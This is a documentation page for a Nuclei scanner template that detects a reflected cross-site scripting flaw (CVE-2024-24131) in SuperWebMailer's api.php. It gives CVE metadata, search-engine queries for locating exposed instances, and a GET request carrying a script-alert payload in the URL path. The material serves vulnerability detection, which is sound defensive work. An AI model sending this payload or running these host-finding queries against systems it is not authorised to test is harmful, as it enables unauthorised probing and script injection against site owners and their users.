SuperWebMailer 9.31.0.01799 - Cross-Site Scripting
ID: CVE-2024-24131
Severity: medium
Author: DhiyaneshDK
Tags: cve,cve2024,superwebmailer,xss
Description
Section titled “Description”SuperWebMailer v9.31.0.01799 was discovered to contain a reflected cross-site scripting (XSS) vulenrability via the component api.php.
YAML Source
Section titled “YAML Source”id: CVE-2024-24131
info: name: SuperWebMailer 9.31.0.01799 - Cross-Site Scripting author: DhiyaneshDK severity: medium description: | SuperWebMailer v9.31.0.01799 was discovered to contain a reflected cross-site scripting (XSS) vulenrability via the component api.php. reference: - https://github.com/fkie-cad/nvd-json-data-feeds - https://nvd.nist.gov/vuln/detail/CVE-2024-24131 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2024-24131 cwe-id: CWE-79 epss-score: 0.00046 epss-percentile: 0.15655 cpe: cpe:2.3:a:superwebmailer:superwebmailer:9.31.0.01799:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: superwebmailer product: superwebmailer shodan-query: - title:"SuperWebMailer" - http.title:"superwebmailer" fofa-query: title="superwebmailer" google-query: intitle:"superwebmailer" tags: cve,cve2024,superwebmailer,xss
http: - method: GET path: - "{{BaseURL}}/api/api.php/<script>alert(document.domain)</script>"
matchers-condition: and matchers: - type: word part: body words: - "<script>alert(document.domain)</script>" - "SuperWebMailerAPI" condition: and
- type: word part: header words: - "text/html"
- type: status status: - 200# digest: 4b0a00483046022100d7c03cf7dce3ff24e912fce6fda45be91e46d12f660a2f7730f38806f5237124022100f64e7d4462165c99b827e285e96855b6ca5ca8763e0ca42de3bbce873b106d53:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-24131.yaml"